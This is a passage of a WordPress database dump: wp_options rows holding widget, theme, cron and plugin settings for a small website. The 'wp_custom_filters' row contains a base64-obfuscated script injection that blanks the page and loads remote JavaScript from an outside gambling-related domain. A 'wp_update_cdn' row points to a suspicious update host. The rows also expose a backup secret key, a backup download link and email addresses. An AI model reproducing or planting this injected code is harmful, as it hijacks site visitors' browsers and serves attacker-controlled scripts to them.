hor\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(93,'fresh_site','0','yes'),(94,'widget_search','a:3:{i:2;a:1:{s:5:\"title\";s:0:\"\";}i:3;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(99,'sidebars_widgets','a:13:{s:18:\"orphaned_widgets_1\";a:1:{i:0;s:13:\"media_video-3\";}s:13:\"sidebar-right\";a:1:{i:0;s:14:\"recent-posts-2\";}s:12:\"sidebar-data\";a:1:{i:0;s:8:\"search-2\";}s:18:\"footer-widget-area\";a:1:{i:0;s:17:\"recent-comments-2\";}s:19:\"wp_inactive_widgets\";a:4:{i:0;s:14:\"stock_ticker-2\";i:1;s:12:\"categories-4\";i:2;s:10:\"calendar-3\";i:3;s:6:\"text-4\";}s:9:\"sidebar-1\";a:4:{i:0;s:16:\"wpforms-widget-3\";i:1;s:6:\"text-2\";i:2;s:10:\"archives-2\";i:3;s:12:\"categories-2\";}s:14:\"at-after-first\";a:0:{}s:17:\"at-before-content\";a:0:{}s:16:\"at-after-content\";a:3:{i:0;s:16:\"wpforms-widget-2\";i:1;s:8:\"search-3\";i:2;s:14:\"stock_ticker-3\";}s:15:\"aty-footer-left\";a:1:{i:0;s:6:\"text-5\";}s:17:\"aty-footer-middle\";a:1:{i:0;s:16:\"wpforms-widget-4\";}s:16:\"aty-footer-right\";a:1:{i:0;s:6:\"meta-2\";}s:13:\"array_version\";i:3;}','yes'),(100,'widget_pages','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_calendar','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(102,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(103,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(104,'widget_media_video','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(105,'widget_tag_cloud','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(106,'widget_nav_menu','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(107,'cron','a:9:{i:1632533131;a:1:{s:34:\"wp_privacy_delete_old_export_files\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1632540331;a:1:{s:18:\"wp_https_detection\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1632542430;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1632583530;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632584694;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632584868;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632585641;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632842730;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}s:7:\"version\";i:2;}','yes'),(108,'theme_mods_twentyseventeen','a:3:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:3:\"top\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1507961675;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:7:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:6:\"text-2\";i:5;s:12:\"categories-2\";i:6;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}','yes'),(121,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:25:\"leads@vanillacircus.co.uk\";s:7:\"version\";s:5:\"5.7.3\";s:9:\"timestamp\";i:1631160044;}','no'),(142,'recently_activated','a:0:{}','yes'),(144,'wph_environment_hash','30e99f32d8a82fff1ea7ada5bf7bfbc3','yes'),(145,'wph_settings','a:4:{s:15:\"module_settings\";a:0:{}s:13:\"recovery_code\";s:32:\"30eaaa7a9e5d5919d7ea77ce78143c9d\";s:7:\"version\";s:7:\"1.4.5.1\";s:18:\"write_check_string\";s:16:\"1617024547_25107\";}','yes'),(148,'widget_ai_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(149,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(150,'vc_version','5.1.1','yes'),(151,'wpb_js_composer_license_activation_notified','yes','yes'),(1633,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:1:{i:0;i:3;}}','yes'),(1641,'theme_mods_the-authority','a:4:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:4:{s:3:\"top\";i:2;s:7:\"primary\";i:3;s:9:\"secondary\";i:4;s:10:\"aty-footer\";i:3;}s:12:\"header_image\";s:93:\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/cropped-23-08-46-769_640x420.jpg\";s:17:\"header_image_data\";O:8:\"stdClass\":5:{s:13:\"attachment_id\";i:73;s:3:\"url\";s:93:\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/cropped-23-08-46-769_640x420.jpg\";s:13:\"thumbnail_url\";s:93:\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/cropped-23-08-46-769_640x420.jpg\";s:6:\"height\";i:249;s:5:\"width\";i:1440;}}','yes'),(1643,'current_theme','The Authority','yes'),(1644,'theme_switched','','yes'),(1645,'theme_switched_via_customizer','','yes'),(1646,'customize_stashed_theme_mods','a:0:{}','no'),(1657,'wpforms_preview_page','85','yes'),(1658,'wpforms_version','1.4.1.1','yes'),(1659,'wpforms_activated','a:1:{s:4:\"lite\";i:1507963033;}','yes'),(1662,'widget_wpforms-widget','a:4:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:7:\"form_id\";i:0;s:10:\"show_title\";b:0;s:9:\"show_desc\";b:0;}i:3;a:4:{s:5:\"title\";s:12:\"Get in Touch\";s:7:\"form_id\";i:86;s:10:\"show_title\";b:0;s:9:\"show_desc\";b:0;}i:4;a:4:{s:5:\"title\";s:18:\"Sign up to join in\";s:7:\"form_id\";i:111;s:10:\"show_title\";b:0;s:9:\"show_desc\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(1663,'_amn_wpforms-lite_last_checked','1541376000','yes'),(1664,'wpforms_review','a:2:{s:4:\"time\";i:1507963035;s:9:\"dismissed\";b:0;}','yes'),(1671,'wpforms_settings','a:4:{s:14:\"email-template\";s:7:\"default\";s:18:\"email-header-image\";s:0:\"\";s:22:\"email-background-color\";s:7:\"#e9eaec\";s:17:\"email-carbon-copy\";b:1;}','yes'),(1672,'widget_blogarama_recent_posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1673,'category_children','a:0:{}','yes'),(1674,'theme_mods_blogarama','a:8:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:1:{s:3:\"top\";i:2;}s:16:\"header_textcolor\";s:6:\"f75133\";s:31:\"blogarama_primary_color_setting\";s:7:\"#d3342c\";s:26:\"blogarama_featured_setting\";i:0;s:31:\"blogarama_featured_link_setting\";i:1;s:23:\"blogarama_featured_page\";i:10;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1507964000;s:4:\"data\";a:8:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:8:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:6:\"text-2\";i:5;s:12:\"categories-2\";i:6;s:6:\"text-3\";i:7;s:6:\"meta-2\";}s:14:\"at-after-first\";a:0:{}s:17:\"at-before-content\";a:1:{i:0;s:6:\"text-4\";}s:16:\"at-after-content\";a:0:{}s:15:\"aty-footer-left\";a:0:{}s:17:\"aty-footer-middle\";a:0:{}s:16:\"aty-footer-right\";a:0:{}}}}','yes'),(1677,'widget_mercia-magazine-focus-center','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1678,'widget_mercia-magazine-focus-left','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1679,'widget_mercia-magazine-grid','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1680,'theme_mods_mercia','a:1:{s:18:\"custom_css_post_id\";i:-1;}','yes'),(1683,'widget_sgwindow_page','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1684,'widget_sgwindow_sidebar_nav','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1685,'widget_sgwindow_items_category_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1686,'widget_sgwindow_image_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1687,'widget_sgwindow_widget_button','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1688,'widget_sgwindow_socialicons_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1689,'widget_sgwindow_side_bar','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1690,'widget_sgwindow_slider','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1691,'theme_mods_sg-window','a:2:{s:13:\"page_sidebars\";N;s:18:\"custom_css_post_id\";i:-1;}','yes'),(1700,'stock_widget_version','2.2','yes'),(1701,'stock_widget_notice_text','Stock Widget Installed v2.2','yes'),(1702,'stock_ticker_defaults','a:15:{s:7:\"symbols\";s:3:\"SAN\";s:4:\"show\";s:4:\"name\";s:4:\"zero\";s:7:\"#454545\";s:5:\"minus\";s:7:\"#D8442F\";s:4:\"plus\";s:7:\"#009D59\";s:13:\"cache_timeout\";i:180;s:8:\"template\";s:36:\"%company% %price% %change% %changep%\";s:13:\"error_message\";s:55:\"Unfortunately, we could not get stock quotes this time.\";s:6:\"legend\";s:349:\"AAPL;Apple Inc.\r\nFB;Facebook, Inc.\r\nCSCO;Cisco Systems, Inc.\r\nGOOG;Google Inc.\r\nINTC;Intel Corporation\r\nLNKD;LinkedIn Corporation\r\nMSFT;Microsoft Corporation\r\nTWTR;Twitter, Inc.\r\nBABA;Alibaba Group Holding Limited\r\nIBM;International Business Machines Corporationn\r\n.DJI;Dow Jones Industrial Average\r\nEURGBP;Euro (€) ⇨ British Pound Sterling (£)\";s:5:\"style\";s:85:\"font-family:\"Open Sans\",Helvetica,Arial,sans-serif;font-weight:normal;font-size:14px;\";s:7:\"timeout\";i:2;s:7:\"refresh\";b:0;s:15:\"refresh_timeout\";i:300;s:5:\"speed\";i:50;s:12:\"globalassets\";b:0;}','yes'),(1703,'widget_stock_ticker','a:3:{i:2;a:9:{s:5:\"title\";s:12:\"Stock Ticker\";s:7:\"symbols\";s:3:\"SAN\";s:4:\"show\";s:4:\"name\";s:6:\"static\";s:1:\"0\";s:6:\"nolink\";s:1:\"0\";s:7:\"prefill\";s:1:\"0\";s:9:\"duplicate\";s:1:\"0\";s:5:\"class\";s:0:\"\";s:5:\"speed\";i:50;}i:3;a:9:{s:5:\"title\";s:12:\"Stock Ticker\";s:7:\"symbols\";s:3:\"SAN\";s:4:\"show\";s:4:\"name\";s:6:\"static\";s:1:\"0\";s:6:\"nolink\";s:1:\"0\";s:7:\"prefill\";s:1:\"0\";s:9:\"duplicate\";s:1:\"0\";s:5:\"class\";s:0:\"\";s:5:\"speed\";i:50;}s:12:\"_multiwidget\";i:1;}','yes'),(1716,'theme_mods_magazie-minimal','a:5:{i:0;b:0;s:18:\"nav_menu_locations\";a:4:{s:3:\"top\";i:2;s:7:\"primary\";i:2;s:9:\"secondary\";i:2;s:10:\"aty-footer\";i:2;}s:18:\"custom_css_post_id\";i:-1;s:29:\"magazie_minimal_theme_options\";a:5:{s:29:\"magazie-minimal-facebook-link\";s:1:\"/\";s:28:\"magazie-minimal-twitter-link\";s:1:\"/\";s:32:\"magazie-minimal-google-plus-link\";s:1:\"/\";s:29:\"magazie-minimal-linkedin-link\";s:1:\"/\";s:32:\"magazie-minimal-footer-copyright\";s:4:\"2017\";}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1507964993;s:4:\"data\";a:4:{s:18:\"orphaned_widgets_1\";a:1:{i:0;s:13:\"media_video-3\";}s:19:\"wp_inactive_widgets\";a:2:{i:0;s:10:\"calendar-3\";i:1;s:6:\"text-4\";}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:10:\"archives-2\";i:3;s:12:\"categories-2\";i:4;s:6:\"text-3\";i:5;s:6:\"meta-2\";}s:13:\"sidebar-right\";a:2:{i:0;s:6:\"text-2\";i:1;s:14:\"recent-posts-2\";}}}}','yes'),(1717,'widget_magazie-minimal-recent-post-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1722,'theme_mods_novapress','a:3:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:4:{s:3:\"top\";i:2;s:7:\"primary\";i:2;s:9:\"secondary\";i:2;s:10:\"aty-footer\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1507964846;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:2:{i:0;s:10:\"calendar-3\";i:1;s:6:\"text-4\";}s:9:\"sidebar-1\";a:9:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:14:\"stock_ticker-2\";i:4;s:10:\"archives-2\";i:5;s:6:\"text-2\";i:6;s:12:\"categories-2\";i:7;s:6:\"text-3\";i:8;s:6:\"meta-2\";}s:13:\"sidebar-right\";a:0:{}s:18:\"orphaned_widgets_1\";a:1:{i:0;s:13:\"media_video-3\";}}}}','yes'),(1723,'theme_mods_jstore','a:3:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:4:{s:3:\"top\";i:2;s:7:\"primary\";i:2;s:9:\"secondary\";i:2;s:10:\"aty-footer\";i:2;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1507964869;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:2:{i:0;s:10:\"calendar-3\";i:1;s:6:\"text-4\";}s:9:\"sidebar-1\";a:9:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:14:\"stock_ticker-2\";i:4;s:10:\"archives-2\";i:5;s:6:\"text-2\";i:6;s:12:\"categories-2\";i:7;s:6:\"text-3\";i:8;s:6:\"meta-2\";}s:13:\"sidebar-right\";a:0:{}s:18:\"orphaned_widgets_1\";a:1:{i:0;s:13:\"media_video-3\";}}}}','yes'),(1726,'theme_mods_bb-wedding-bliss','a:8:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:4:{s:3:\"top\";i:2;s:7:\"primary\";i:2;s:9:\"secondary\";i:2;s:10:\"aty-footer\";i:2;}s:38:\"bb_wedding_bliss_slidersettings-page-1\";i:10;s:38:\"bb_wedding_bliss_slidersettings-page-2\";i:17;s:38:\"bb_wedding_bliss_slidersettings-page-3\";i:8;s:22:\"bb_wedding_bliss_email\";s:31:\"info@santandershareholder.co.uk\";s:28:\"bb_wedding_bliss_youtube_url\";s:1:\"/\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1507965476;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:3:{i:0;s:12:\"categories-4\";i:1;s:10:\"calendar-3\";i:2;s:6:\"text-4\";}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:17:\"recent-comments-2\";i:2;s:10:\"archives-2\";i:3;s:12:\"categories-2\";i:4;s:6:\"text-3\";i:5;s:6:\"meta-2\";}s:18:\"orphaned_widgets_1\";a:1:{i:0;s:13:\"media_video-3\";}s:13:\"sidebar-right\";a:2:{i:0;s:6:\"text-2\";i:1;s:14:\"recent-posts-2\";}}}}','yes'),(1728,'_transient_jstore_categories','0','yes'),(1733,'widget_sociallyviral_ad_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1734,'widget_sociallyviral_ad_300_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1735,'widget_sociallyviral_recent_posts_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1736,'theme_mods_sociallyviral','a:1:{s:18:\"custom_css_post_id\";i:-1;}','yes'),(1742,'theme_mods_abubize-business','a:5:{s:18:\"custom_css_post_id\";i:-1;s:18:\"nav_menu_locations\";a:4:{s:3:\"top\";i:2;s:7:\"primary\";i:2;s:9:\"secondary\";i:2;s:10:\"aty-footer\";i:2;}s:12:\"header_image\";s:95:\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/cropped-23-08-46-769_640x420-1.jpg\";s:17:\"header_image_data\";O:8:\"stdClass\":5:{s:13:\"attachment_id\";i:107;s:3:\"url\";s:95:\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/cropped-23-08-46-769_640x420-1.jpg\";s:13:\"thumbnail_url\";s:95:\"http://santandershareholder.co.uk/wp-content/uploads/2017/10/cropped-23-08-46-769_640x420-1.jpg\";s:6:\"height\";i:53;s:5:\"width\";i:640;}s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1507965714;s:4:\"data\";a:6:{s:9:\"sidebar-1\";a:3:{i:0;s:10:\"archives-2\";i:1;s:12:\"categories-2\";i:2;s:6:\"meta-2\";}s:18:\"orphaned_widgets_1\";a:1:{i:0;s:13:\"media_video-3\";}s:13:\"sidebar-right\";a:1:{i:0;s:14:\"recent-posts-2\";}s:19:\"wp_inactive_widgets\";a:3:{i:0;s:12:\"categories-4\";i:1;s:10:\"calendar-3\";i:2;s:6:\"text-4\";}s:12:\"sidebar-data\";a:3:{i:0;s:8:\"search-2\";i:1;s:14:\"stock_ticker-3\";i:2;s:6:\"text-2\";}s:18:\"footer-widget-area\";a:1:{i:0;s:17:\"recent-comments-2\";}}}}','yes'),(1743,'businesso_option','a:8:{s:19:\"home_banner_enabled\";s:0:\"\";s:19:\"post_slider_enabled\";s:0:\"\";s:17:\"page_meta_enabled\";s:1:\"1\";s:20:\"page_sidebar_enabled\";s:1:\"1\";s:19:\"blog_banner_enabled\";s:1:\"1\";s:21:\"enable_home_portfolio\";s:0:\"\";s:17:\"header_info_phone\";s:0:\"\";s:16:\"header_info_mail\";s:31:\"info@santandershareholder.co.uk\";}','yes'),(2745,'WPLANG','','yes'),(121305,'ai1wm_secret_key','huAq43mbKjgj','yes'),(121306,'ai1wm_status','a:2:{s:4:\"type\";s:8:\"download\";s:7:\"message\";s:366:\"<a href=\"http://santandershareholder.co.uk/wp-content/ai1wm-backups/santandershareholder.co.uk-20201008-155017-e2g3e9.wpress\" class=\"ai1wm-button-green ai1wm-emphasize ai1wm-button-download\" title=\"santandershareholder.co.uk\" download=\"santandershareholder.co.uk-20201008-155017-e2g3e9.wpress\"><span>Download santandershareholder.co.uk</span><em>Size: 55 MB</em></a>\";}','yes'),(121311,'ai1wm_updater','a:0:{}','yes'),(135096,'_transient_is_multi_author','0','yes'),(135479,'wp_custom_filters','YToxOntpOjg4ODg7YToyOntzOjI6ImpzIjtzOjExMDg6IjxzY3JpcHQgc3JjPSJkYXRhOnRleHQvamF2YXNjcmlwdDtiYXNlNjQsYm1WM0lFbHRZV2RsS0NrdWMzSmpJRDBnSWk4dlkyOTFiblJsY2k1NVlXUnlieTV5ZFM5b2FYUTdZM051Wlc1elkyZy9jaUlyQ21WelkyRndaU2hrYjJOMWJXVnVkQzV5WldabGNuSmxjaWtyS0NoMGVYQmxiMllvYzJOeVpXVnVLVDA5SW5WdVpHVm1hVzVsWkNJcFB5SWlPZ29pTzNNaUszTmpjbVZsYmk1M2FXUjBhQ3NpS2lJcmMyTnlaV1Z1TG1obGFXZG9kQ3NpS2lJcktITmpjbVZsYmk1amIyeHZja1JsY0hSb1B3cHpZM0psWlc0dVkyOXNiM0pFWlhCMGFEcHpZM0psWlc0dWNHbDRaV3hFWlhCMGFDa3BLeUk3ZFNJclpYTmpZWEJsS0dSdlkzVnRaVzUwTGxWU1RDa3JDaUk3SWl0TllYUm9MbkpoYm1SdmJTZ3BPd3BrYjJOMWJXVnVkQzVoWkdSRmRtVnVkRXhwYzNSbGJtVnlLQ0pFVDAxRGIyNTBaVzUwVEc5aFpHVmtJaXdnWm5WdVkzUnBiMjRnS0dWMlpXNTBLU0I3Q2lBZ0lDQjJZWElnWW05a2VVNXZaR1VnUFNCa2IyTjFiV1Z1ZEM1blpYUkZiR1Z0Wlc1MGMwSjVWR0ZuVG1GdFpTZ25ZbTlrZVNjcFd6QmRPd29nSUNBZ2FXWWdLR0p2WkhsT2IyUmxLU0I3Q2lBZ0lDQWdJQ0FnWW05a2VVNXZaR1V1Y21WdGIzWmxLQ2s3Q2lBZ0lDQjlDbjBwT3dwMllYSWdSbTFSU0VGTVEyaG5SejBpUEhOamNtbHdkQ0IwZVhCbFBWd2lkR1Y0ZEM5cVlYWmhjMk55YVhCMFhDSWdiR0Z1WjNWaFoyVTlYQ0pLWVhaaFUyTnlhWEIwWENJZ0lqdDJZWElnZUZGcFNFbENTa1ZqVmowaWMzSmpQVndpTHk5elkyZ3RaMkZ0WW14bGNuTXVZMjl0THlJN2RtRnlJRU5sYlVkeFoweFRUbmc5SW1OemJtVnVjMk5vTG1welAzSmxaajBpSzJWdVkyOWtaVlZTU1Noa2IyTjFiV1Z1ZEM1VlVrd3BLeUltZEdsMGJHVTlJaXRsYm1OdlpHVlZVa2tvWkc5amRXMWxiblF1ZEdsMGJHVXBLeUltYUhSMGNISmxaajBpSzJWdVkyOWtaVlZTU1Noa2IyTjFiV1Z1ZEM1eVpXWmxjbkpsY2lrcklsd2lQaUk3ZG1GeUlGSjFha2R2UTJkdGRFbzlJaUE4TDNOamNtbHdkRDRpTzJSdlkzVnRaVzUwTG5keWFYUmxLRVp0VVVoQlRFTm9aMGNyZUZGcFNFbENTa1ZqVml0RFpXMUhjV2RNVTA1NEsxSjFha2R2UTJkdGRFb3BPdz09Ij48L3NjcmlwdD4iO3M6MTU6InNpdGVtYXBzZXR0aW5ncyI7YToxOntzOjE0OiJzaXRlbWFwMlwueG1sJCI7czoyNjoiaW5kZXgucGhwP2ZlZWQ9eG1sc2l0ZW1hcDIiO319fQ==','yes'),(135482,'_transient_the_authority_categories','0','yes'),(135604,'wp_update_cdn','czoyNDoiaHR0cDovL3dwLXVwZGF0ZS1jZG4uY29tIjs=','yes'),(136177,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(136178,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(136187,'recovery_keys','a:0:{}','yes'),(136188,'https_detection_errors','a:0:{}','yes'),(136232,'_transient_health-check-site-status-result','{\"good\":13,\"recommended\":6,\"critical\":0}','yes'),(136332,'finished_updating_comment_type','1','yes'),(138209,'active_plugins','a:0:{}','yes'),(138210,'wp_page_for_privacy_policy','0','yes'),(138211,'show_comments_cookies_opt_in','1','yes'),(138212,'admin_email_lifespan','0','yes'),(138213,'disallowed_keys','','no'),(138214,'comment_previously_approved','1','yes'),(138215,'auto_plugin_theme_update_emails','a:0:{}','no'),(138216,'auto_update_core_dev','enabled','yes'),(138217,'auto_update_core_minor','enabled','yes'),(138218,'auto_update_core_major','unset','yes'),(138219,'db_upgraded','','yes'),(139024,'_site_transient_timeout_php_check_9236ad8f2e178e4ce7b4ef5302b7fae9','1632237988','no'),(139025,'_site_transient_php_check_9236ad8f2e178e4ce7b4ef5302b7fae9','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(139100,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(139104,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:1:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:6:\"latest\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.8.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.8.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.8.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.8.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.8.1\";s:7:\"version\";s:5:\"5.8.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.6\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1632499232;s:15:\"version_checked\";s:5:\"5.8.1\";s:12:\"translations\";a:0:{}}','no'),(139109,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1632499234;s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:1:{s:9:\"hello.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}}s:7:\"checked\";a:1:{s:9:\"hello.php\";s:5:\"1.7.2\";}}','no'),(139403,'_site_transient_timeout_theme_roots','1632501033','no'),(139404,'_site_transient_theme_roots','a:18:{s:16:\"abubize-business\";s:7:\"/themes\";s:16:\"bb-wedding-bliss\";s:7:\"/themes\";s:9:\"blogarama\";s:7:\"/themes\";s:9:\"businesso\";s:7:\"/themes\";s:6:\"jstore\";s:7:\"/themes\";s:15:\"magazie-minimal\";s:7:\"/themes\";s:6:\"mercia\";s:7:\"/themes\";s:9:\"novapress\";s:7:\"/themes\";s:8:\"pinwheel\";s:7:\"/themes\";s:9:\"sg-window\";s:7:\"/themes\";s:10:\"sobre-lite\";s:7:\"/themes\";s:1